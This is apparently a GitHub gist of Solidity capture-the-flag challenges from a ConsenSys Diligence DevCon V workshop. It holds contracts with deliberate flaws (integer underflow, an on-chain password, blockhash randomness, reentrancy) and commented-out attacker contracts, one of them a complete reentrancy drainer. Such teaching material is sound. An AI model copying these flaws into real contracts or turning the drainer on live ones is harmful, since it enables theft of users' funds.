Skip to content

Instantly share code, notes, and snippets.

@shayanb

shayanb/Challenge1.sol

Last active October 9, 2019 11:39
Show Gist options
  • Save shayanb/19dace14c6730a57c8df8682eb3f1ba6 to your computer and use it in GitHub Desktop.
Save shayanb/19dace14c6730a57c8df8682eb3f1ba6 to your computer and use it in GitHub Desktop.
Download ZIP
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.5.8+commit.23d335f2.js&optimize=false&gist=
Raw
README.md

// ConsenSys Diligence // DevCon V - October 2019 // Osaka, Japan

These files: https://kik.to/d5

Metamask: https://metamask.io/ Get Ropsten coins: https://faucet.metamask.io/

Solidity Documentation: https://solidity.readthedocs.io/en/latest/

Ethereum Smart Contract Security Best Practices: https://consensys.github.io/smart-contract-best-practices

Capture the Ether: https://capturetheether.com

ConsenSys Diligence Twitter: @ConsenSysAudits

More about what we do: https://diligence.consensys.net/

// ██████╗ ██████╗ ███╗ ██╗███████╗███████╗███╗ ██╗███████╗██╗ ██╗███████╗ // ██╔════╝██╔═══██╗████╗ ██║██╔════╝██╔════╝████╗ ██║██╔════╝╚██╗ ██╔╝██╔════╝ // ██║ ██║ ██║██╔██╗ ██║███████╗█████╗ ██╔██╗ ██║███████╗ ╚████╔╝ ███████╗ // ██║ ██║ ██║██║╚██╗██║╚════██║██╔══╝ ██║╚██╗██║╚════██║ ╚██╔╝ ╚════██║ // ╚██████╗╚██████╔╝██║ ╚████║███████║███████╗██║ ╚████║███████║ ██║ ███████║ // ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚══════╝

// ██████╗ ██╗██╗ ██╗ ██████╗ ███████╗███╗ ██╗ ██████╗███████╗
// ██╔══██╗██║██║ ██║██╔════╝ ██╔════╝████╗ ██║██╔════╝██╔════╝
// ██║ ██║██║██║ ██║██║ ███╗█████╗ ██╔██╗ ██║██║ █████╗
// ██║ ██║██║██║ ██║██║ ██║██╔══╝ ██║╚██╗██║██║ ██╔══╝
// ██████╔╝██║███████╗██║╚██████╔╝███████╗██║ ╚████║╚██████╗███████╗
// ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝╚══════╝

Raw
Challenge1.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Can you have a gazillion balance?
contract challenge1 {
uint256 public balance;
constructor() public {
balance = 10;
}
function buy() external payable {
balance += msg.value;
}
function burn(uint256 amount) external {
balance -= amount;
}
}
// ___ __ __ _ ____ ____ __ _ ____ _ _ ____
// / __)/ \ ( ( \/ ___)( __)( ( \/ ___)( \/ )/ ___)
// ( (__( O )/ /\___ \ ) _) / /\___ \ ) / \___ \
// \___)\__/ \_)__)(____/(____)\_)__)(____/(__/ (____/
// ____ __ __ __ ___ ____ __ _ ___ ____
// ( \( )( ) ( )/ __)( __)( ( \ / __)( __)
// ) D ( )( / (_/\ )(( (_ \ ) _) / /( (__ ) _)
// (____/(__)\____/(__)\___/(____)\_)__) \___)(____)
Raw
Challenge2.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Guess the password for the safe
// Deployed on Ropsten: 0xC224beb93142607b91d21BBd4A67a34a50E26AAB
contract challenge2 {
bytes32 private hash;
address public owner;
constructor(string memory secretPassword) public payable{
require(msg.value == 1 ether); //1 Ether Deposit required
owner = msg.sender;
hash = keccak256(abi.encode(secretPassword));
}
function changePassword(string memory secretPassword) public payable{
require(msg.sender == owner); //OnlyOwner
require(msg.value == 1 ether); //1 Ether Deposit required
hash = keccak256(abi.encode(secretPassword));
}
function guessPassword(string memory password) public payable {
require(keccak256(abi.encode(password)) == hash);
msg.sender.transfer(1337);
}
}
// _________ _________
// \_ ___ \ ____ ____ ______ ____ ____ / _____/__.__. ______
// / \ \/ / _ \ / \ / ___// __ \ / \ \_____ < | |/ ___/
// \ \___( <_> ) | \\___ \\ ___/| | \/ \___ |\___ \
// \______ /\____/|___| /____ >\___ >___| /_______ / ____/____ >
// \/ \/ \/ \/ \/ \/\/ \/
// ________ .__.__ .__
// \______ \ |__| | |__| ____ ____ ____ ____ ____
// | | \| | | | |/ ___\_/ __ \ / \_/ ___\/ __ \
// | ` \ | |_| / /_/ > ___/| | \ \__\ ___/
// /_______ /__|____/__\___ / \___ >___| /\___ >___ >
// \/ /_____/ \/ \/ \/ \/
Raw
Challenge3.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Lottery using block hash as source of randomness
// Deployed on Ropsten: 0x70707c3163575fb0eba9f291f75ff0742cb18386
contract challenge3 {
uint256 public answer;
constructor () payable public {
require(msg.value == 1 ether);
}
function lottery(uint256 n) payable public {
require(msg.value > 0); //buy ticket, it should be more than 0
answer = uint256(keccak256(abi.encode(blockhash(block.number - 1))));
if (n == answer) {
msg.sender.transfer(1337);
}
}
}
// ___ __
// / __\___ _ __ ___ ___ _ __ / _\_ _ ___
// / / / _ \| '_ \/ __|/ _ \ '_ \\ \| | | / __|
// / /__| (_) | | | \__ \ __/ | | |\ \ |_| \__ \
// \____/\___/|_| |_|___/\___|_| |_\__/\__, |___/
// |___/
// ___ _ _ _
// / (_) (_) __ _ ___ _ __ ___ ___
// / /\ / | | |/ _` |/ _ \ '_ \ / __/ _ \
// / /_//| | | | (_| | __/ | | | (_| __/
// /___,' |_|_|_|\__, |\___|_| |_|\___\___|
// |___/
// contract attack {
// doAttack (challenge3 target) public payable {
// require(msg.value > 0);
// target.lottery.value(msg.value)(???);
// msg.sender.transfer(address(this).balance);
// //selfdestruct(msg.sender);
// }
// }
Raw
Challenge4.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Steal money from charity (For educational purposes only)
// Deployed on Ropsten: 0x315a3254ff66c387a87d1771ae4877b4782a1a7c
contract challenge4 {
mapping(address => uint) public balances;
event paid(address payee, uint amount);
constructor() public payable{
require(msg.value == 1 ether);
balances[msg.sender] = msg.value;
}
function donate(address _to) public payable {
balances[_to] += msg.value;
}
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
(bool success, ) = msg.sender.call.value(_amount)("");
if(success) {
emit paid(msg.sender, _amount);
}
balances[msg.sender] -= _amount; //deduct the balance
}
}
function() external payable {}
}
// ______ ______ __ __ ______ ______ __ __ ______ __ __ ______
// /\ ___\ /\ __ \ /\ "-.\ \ /\ ___\ /\ ___\ /\ "-.\ \ /\ ___\ /\ \_\ \ /\ ___\
// \ \ \____ \ \ \/\ \ \ \ \-. \ \ \___ \ \ \ __\ \ \ \-. \ \ \___ \ \ \____ \ \ \___ \
// \ \_____\ \ \_____\ \ \_\\"\_\ \/\_____\ \ \_____\ \ \_\\"\_\ \/\_____\ \/\_____\ \/\_____\
// \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_____/
// _____ __ __ __ ______ ______ __ __ ______ ______
// /\ __-. /\ \ /\ \ /\ \ /\ ___\ /\ ___\ /\ "-.\ \ /\ ___\ /\ ___\
// \ \ \/\ \ \ \ \ \ \ \____ \ \ \ \ \ \__ \ \ \ __\ \ \ \-. \ \ \ \____ \ \ __\
// \ \____- \ \_\ \ \_____\ \ \_\ \ \_____\ \ \_____\ \ \_\\"\_\ \ \_____\ \ \_____\
// \/____/ \/_/ \/_____/ \/_/ \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/
// contract Attacker {
// challenge4 target;
// constructor(address payable targetAddress) public payable {
// target = challenge4(targetAddress);
// target.donate.value(msg.value)(address(this));
// }
// function attack() public {
// target.withdraw(target.balanceOf(address(this)));
// }
// function () external payable {
// if (address(target).balance >= 1 ether) {
// //The check also can be on gas
// target.withdraw(target.balanceOf(address(this)));
// }
// }
// }
Raw
Challenge5.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
contract challenge5 {
string public name;
address private owner;
//Placeholder
}
// ██████╗ ██████╗ ███╗ ██╗███████╗███████╗███╗ ██╗███████╗██╗ ██╗███████╗
// ██╔════╝██╔═══██╗████╗ ██║██╔════╝██╔════╝████╗ ██║██╔════╝╚██╗ ██╔╝██╔════╝
// ██║ ██║ ██║██╔██╗ ██║███████╗█████╗ ██╔██╗ ██║███████╗ ╚████╔╝ ███████╗
// ██║ ██║ ██║██║╚██╗██║╚════██║██╔══╝ ██║╚██╗██║╚════██║ ╚██╔╝ ╚════██║
// ╚██████╗╚██████╔╝██║ ╚████║███████║███████╗██║ ╚████║███████║ ██║ ███████║
// ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚══════╝
// ██████╗ ██╗██╗ ██╗ ██████╗ ███████╗███╗ ██╗ ██████╗███████╗
// ██╔══██╗██║██║ ██║██╔════╝ ██╔════╝████╗ ██║██╔════╝██╔════╝
// ██║ ██║██║██║ ██║██║ ███╗█████╗ ██╔██╗ ██║██║ █████╗
// ██║ ██║██║██║ ██║██║ ██║██╔══╝ ██║╚██╗██║██║ ██╔══╝
// ██████╔╝██║███████╗██║╚██████╔╝███████╗██║ ╚████║╚██████╗███████╗
// ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝╚══════╝
Raw
HelloWorld.sol
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Say Hi
//Deployed at Ropsten: 0x0f6501d05272b95b8ad35c64f1939626ff01c81d
contract helloWorld {
//Storage variables
string public name;
address private owner;
//Defining events
event Hi(string name);
constructor() public {
owner = msg.sender;
}
function sayHi(string memory _name) public {
//change the name if owner calls
if (msg.sender == owner) {
name = _name;
}
//call event
emit Hi(_name);
}
//fallback function.
function() external {
emit Hi("Hello World");
}
}
// ______ _____
// / ____/___ ____ ________ ____ / ___/__ _______
// / / / __ \/ __ \/ ___/ _ \/ __ \\__ \/ / / / ___/
// / /___/ /_/ / / / (__ ) __/ / / /__/ / /_/ (__ )
// \__________/___/_/____/\___/_/ /_/____/\__, /____/
// / __ \(_) (_)___ ____ ____ ______//___/
// / / / / / / / __ `/ _ \/ __ \/ ___/ _ \
// / /_/ / / / / /_/ / __/ / / / /__/ __/
// /_____/_/_/_/\__, /\___/_/ /_/\___/\___/
// /____/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment